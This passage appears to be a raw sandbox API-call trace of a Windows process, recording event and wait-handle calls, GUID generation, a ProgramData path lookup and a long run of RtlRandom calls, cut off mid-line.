[0084.400] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0084.400] CloseHandle (hObject=0x25c) returned 1 [0084.400] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.400] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.400] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0084.632] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.632] GetCurrentThreadId () returned 0x834 [0084.633] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0084.633] strlen (_Str="core") returned 0x4 [0084.634] GetCurrentThreadId () returned 0x834 [0084.634] GetCurrentThreadId () returned 0x834 [0084.634] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0084.634] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0084.635] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0084.635] CloseHandle (hObject=0x2bc) returned 1 [0084.635] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0084.635] CloseHandle (hObject=0x25c) returned 1 [0084.635] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.636] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.636] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0084.868] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.868] GetCurrentThreadId () returned 0x834 [0084.868] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0084.868] strlen (_Str="core") returned 0x4 [0084.868] GetCurrentThreadId () returned 0x834 [0084.868] GetCurrentThreadId () returned 0x834 [0084.868] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0084.868] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0084.869] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0084.869] CloseHandle (hObject=0x2bc) returned 1 [0084.869] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0084.869] CloseHandle (hObject=0x25c) returned 1 [0084.870] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.870] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0084.870] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0085.102] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.102] GetCurrentThreadId () returned 0x834 [0085.102] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0085.102] strlen (_Str="core") returned 0x4 [0085.102] GetCurrentThreadId () returned 0x834 [0085.102] GetCurrentThreadId () returned 0x834 [0085.102] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0085.102] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0085.104] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0085.104] CloseHandle (hObject=0x2bc) returned 1 [0085.104] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0085.104] CloseHandle (hObject=0x25c) returned 1 [0085.104] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.104] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.104] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0085.337] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.337] GetCurrentThreadId () returned 0x834 [0085.337] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0085.337] strlen (_Str="core") returned 0x4 [0085.338] GetCurrentThreadId () returned 0x834 [0085.338] GetCurrentThreadId () returned 0x834 [0085.338] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0085.338] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0085.339] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0085.339] CloseHandle (hObject=0x2bc) returned 1 [0085.339] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0085.339] CloseHandle (hObject=0x25c) returned 1 [0085.339] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.339] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.339] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0085.571] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.571] GetCurrentThreadId () returned 0x834 [0085.571] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0085.572] strlen (_Str="core") returned 0x4 [0085.572] GetCurrentThreadId () returned 0x834 [0085.572] GetCurrentThreadId () returned 0x834 [0085.572] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0085.572] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0085.573] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0085.573] CloseHandle (hObject=0x2bc) returned 1 [0085.573] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0085.573] CloseHandle (hObject=0x25c) returned 1 [0085.573] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.574] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.574] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0085.806] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.806] GetCurrentThreadId () returned 0x834 [0085.806] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0085.806] strlen (_Str="core") returned 0x4 [0085.806] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0085.808] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0085.808] CloseHandle (hObject=0x2bc) returned 1 [0085.808] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0085.808] CloseHandle (hObject=0x25c) returned 1 [0085.808] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.808] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0085.808] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0086.040] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.040] GetCurrentThreadId () returned 0x834 [0086.040] strlen (_Str="core") returned 0x4 [0086.040] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0086.042] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0086.042] CloseHandle (hObject=0x2bc) returned 1 [0086.042] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0086.042] CloseHandle (hObject=0x25c) returned 1 [0086.042] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.042] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.042] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0086.274] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.275] GetCurrentThreadId () returned 0x834 [0086.275] strlen (_Str="core") returned 0x4 [0086.275] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0086.276] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0086.276] CloseHandle (hObject=0x2bc) returned 1 [0086.276] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0086.276] CloseHandle (hObject=0x25c) returned 1 [0086.276] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.276] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.276] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0086.508] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.509] GetCurrentThreadId () returned 0x834 [0086.509] strlen (_Str="core") returned 0x4 [0086.509] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0086.510] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0086.510] CloseHandle (hObject=0x2bc) returned 1 [0086.510] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0086.510] CloseHandle (hObject=0x25c) returned 1 [0086.510] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.510] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.510] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0086.744] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.744] GetCurrentThreadId () returned 0x834 [0086.744] strlen (_Str="core") returned 0x4 [0086.744] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0086.745] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0086.746] CloseHandle (hObject=0x2bc) returned 1 [0086.746] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0086.746] CloseHandle (hObject=0x25c) returned 1 [0086.746] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.746] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.746] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0086.979] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.979] GetCurrentThreadId () returned 0x834 [0086.979] strlen (_Str="core") returned 0x4 [0086.979] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0086.981] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0086.981] CloseHandle (hObject=0x2bc) returned 1 [0086.981] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0086.981] CloseHandle (hObject=0x25c) returned 1 [0086.982] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.982] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0086.982] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0087.368] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.368] GetCurrentThreadId () returned 0x834 [0087.368] strlen (_Str="core") returned 0x4 [0087.369] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0087.370] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0087.370] CloseHandle (hObject=0x2bc) returned 1 [0087.370] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0087.370] CloseHandle (hObject=0x25c) returned 1 [0087.371] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.371] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.371] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0087.603] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.603] GetCurrentThreadId () returned 0x834 [0087.603] strlen (_Str="core") returned 0x4 [0087.603] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0087.605] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0087.605] CloseHandle (hObject=0x2bc) returned 1 [0087.605] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0087.605] CloseHandle (hObject=0x25c) returned 1 [0087.605] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.605] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.605] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0087.837] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.837] GetCurrentThreadId () returned 0x834 [0087.838] strlen (_Str="core") returned 0x4 [0087.838] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0087.839] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0087.839] CloseHandle (hObject=0x2bc) returned 1 [0087.839] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0087.839] CloseHandle (hObject=0x25c) returned 1 [0087.839] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.839] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0087.839] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0088.135] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.135] GetCurrentThreadId () returned 0x834 [0088.135] strlen (_Str="core") returned 0x4 [0088.135] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0088.137] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0088.137] CloseHandle (hObject=0x2bc) returned 1 [0088.137] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0088.137] CloseHandle (hObject=0x25c) returned 1 [0088.137] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.137] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.137] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0088.374] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.374] GetCurrentThreadId () returned 0x834 [0088.374] strlen (_Str="core") returned 0x4 [0088.374] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0088.376] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0088.376] CloseHandle (hObject=0x2bc) returned 1 [0088.376] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0088.376] CloseHandle (hObject=0x25c) returned 1 [0088.376] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.376] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.376] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0088.609] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.609] GetCurrentThreadId () returned 0x834 [0088.611] strlen (_Str="core") returned 0x4 [0088.611] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0088.613] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0088.613] CloseHandle (hObject=0x2bc) returned 1 [0088.613] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0088.613] CloseHandle (hObject=0x25c) returned 1 [0088.613] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.613] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.613] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0088.845] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.845] GetCurrentThreadId () returned 0x834 [0088.845] strlen (_Str="core") returned 0x4 [0088.845] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d24) returned 1 [0088.847] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x7530) returned 0x0 [0088.847] CloseHandle (hObject=0x2bc) returned 1 [0088.847] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0088.847] CloseHandle (hObject=0x25c) returned 1 [0088.847] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.847] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0088.847] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0089.078] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.078] GetCurrentThreadId () returned 0x834 [0089.078] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x59ff624, nSize=0x104 | out: lpDst="C:\\ProgramData") returned 0xf [0089.078] wcslen (_String="C:\\ProgramData") returned 0xe [0089.078] CoCreateGuid (in: pguid=0x59ff600 | out: pguid=0x59ff600*(Data1=0x252e9d6f, Data2=0x46f0, Data3=0x4cf5, Data4=([0]=0x86, [1]=0x86, [2]=0xf2, [3]=0xa6, [4]=0x73, [5]=0xc5, [6]=0x79, [7]=0xa2))) returned 0x0 [0089.079] _snprintf (in: _Dest=0x59ff550, _Count=0x78, _Format="%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" | out: _Dest="252e9d6f-46f0-4cf5-8686-f2a673c579a2") returned 36 [0089.079] strlen (_Str="252e9d6f-46f0-4cf5-8686-f2a673c579a2") returned 0x24 [0089.079] strlen (_Str="252e9d6f-46f0-4cf5-8686-f2a673c579a2") returned 0x24 [0089.079] wcslen (_String="252e9d6f-46f0-4cf5-8686-f2a673c579a2") returned 0x24 [0089.079] CoCreateGuid (in: pguid=0x59ff600 | out: pguid=0x59ff600*(Data1=0xaf77746e, Data2=0x8a65, Data3=0x4302, Data4=([0]=0x80, [1]=0x42, [2]=0xf6, [3]=0x1, [4]=0x79, [5]=0x18, [6]=0xc6, [7]=0x69))) returned 0x0 [0089.079] _snprintf (in: _Dest=0x59ff550, _Count=0x78, _Format="%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" | out: _Dest="af77746e-8a65-4302-8042-f6017918c669") returned 36 [0089.079] strlen (_Str="af77746e-8a65-4302-8042-f6017918c669") returned 0x24 [0089.079] strlen (_Str="af77746e-8a65-4302-8042-f6017918c669") returned 0x24 [0089.079] wcslen (_String="af77746e-8a65-4302-8042-f6017918c669") returned 0x24 [0089.081] QueryPerformanceCounter (in: lpPerformanceCount=0x59ff5e8 | out: lpPerformanceCount=0x59ff5e8*=567611164) returned 1 [0089.081] GetTickCount () returned 0x25282 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6141ba38 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1e060079 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x9b0091c [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x62e26657 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x65522971 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2d3db005 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x72636d7f [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x186b0aeb [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x9101613 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4886f65c [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6b87e493 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3481d90a [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x109f92fe [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x29e3505b [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x300aee7d [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2d763391 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6204f4a1 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3bfc7800 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1f18e0bb [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x77e3c147 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xbb3ed05 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3607505d [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5274c742 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4bf8ea66 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x325cd5a3 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x79fb7cf1 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x567be81a [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x18202308 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x27382f50 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x39ed42b8 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4888618b [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6680947c [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x48ec3447 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x77ec3c0f [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1828d8bd [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3db8dd44 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x15899067 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x20b0c424 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1ce4e8dd [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x65addc60 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1ec10b9b [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xf95da37 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x753e658f [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x46cfe113 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6f9ef5b2 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1898d11e [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x6db19a21 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x364874ce [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5f847f55 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x9b02304 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3d06de86 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5133e6d3 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x159813ff [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x472e398c [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x53b8e902 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x7dd80828 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x73bf1622 [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x9f60d9e [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x5905dbdc [0089.081] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x244dbd2a [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xf74e3a3 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x500cebdb [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x66d60ddb [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x53fa1873 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x75e4c92f [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x452efa5e [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x58b11c76 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x32acee6e [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x41ce5970 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x2a8c2a5 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3b1b792 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0xff01e6f [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x74c4adf9 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x4dd5daa9 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x724d83c0 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x14d4eac4 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x3e12419d [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x16d4dadc [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x55de370c [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x133ed9f6 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x31f57880 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x1c10ab28 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x432e6dfc [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 0x53d75dd0 [0089.082] RtlRandom (in: Seed=0x1c9851c | out: Seed=0x1c9851c) returned 